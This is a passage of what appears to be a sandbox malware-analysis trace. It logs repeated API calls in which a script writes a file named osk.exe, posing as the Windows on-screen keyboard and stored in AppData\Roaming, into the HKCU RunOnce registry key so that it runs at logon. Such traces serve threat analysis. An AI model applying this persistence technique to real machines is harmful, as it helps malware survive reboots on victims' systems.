out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.362] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.362] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0080.363] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.363] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x76 [0080.363] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.364] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0080.364] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.364] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.364] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.364] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.364] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.364] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.364] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.364] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.365] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.365] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.365] RegCloseKey (hKey=0x280) returned 0x0 [0080.365] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.365] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.365] SetTimer (hWnd=0x20280, nIDEvent=0x2075, uElapse=0xa, lpTimerFunc=0x0) returned 0x2075 [0080.365] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.377] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.377] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.377] KillTimer (hWnd=0x20280, uIDEvent=0x2075) returned 1 [0080.378] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.378] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.378] IUnknown:Release (This=0x787518) returned 0x1 [0080.378] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.378] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.378] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.378] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.378] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.379] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0080.379] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.379] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x77 [0080.379] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.380] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0080.380] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.380] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.380] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.380] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.380] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.380] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.380] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.380] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.381] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.381] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.381] RegCloseKey (hKey=0x280) returned 0x0 [0080.381] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.381] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.381] SetTimer (hWnd=0x20280, nIDEvent=0x2076, uElapse=0xa, lpTimerFunc=0x0) returned 0x2076 [0080.381] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.392] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.392] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.392] KillTimer (hWnd=0x20280, uIDEvent=0x2076) returned 1 [0080.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.393] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.393] IUnknown:Release (This=0x787518) returned 0x1 [0080.393] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.393] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.393] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.393] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.393] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.393] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.393] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.393] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.394] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.394] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0080.394] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.394] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x78 [0080.394] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.395] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0080.395] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.395] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.395] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.395] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.395] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.395] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.395] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.395] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.396] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.396] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.396] RegCloseKey (hKey=0x280) returned 0x0 [0080.396] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.396] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.396] SetTimer (hWnd=0x20280, nIDEvent=0x2077, uElapse=0xa, lpTimerFunc=0x0) returned 0x2077 [0080.396] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.408] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.408] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.408] KillTimer (hWnd=0x20280, uIDEvent=0x2077) returned 1 [0080.408] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.408] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.409] IUnknown:Release (This=0x787518) returned 0x1 [0080.409] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.409] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.409] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.409] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.409] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, 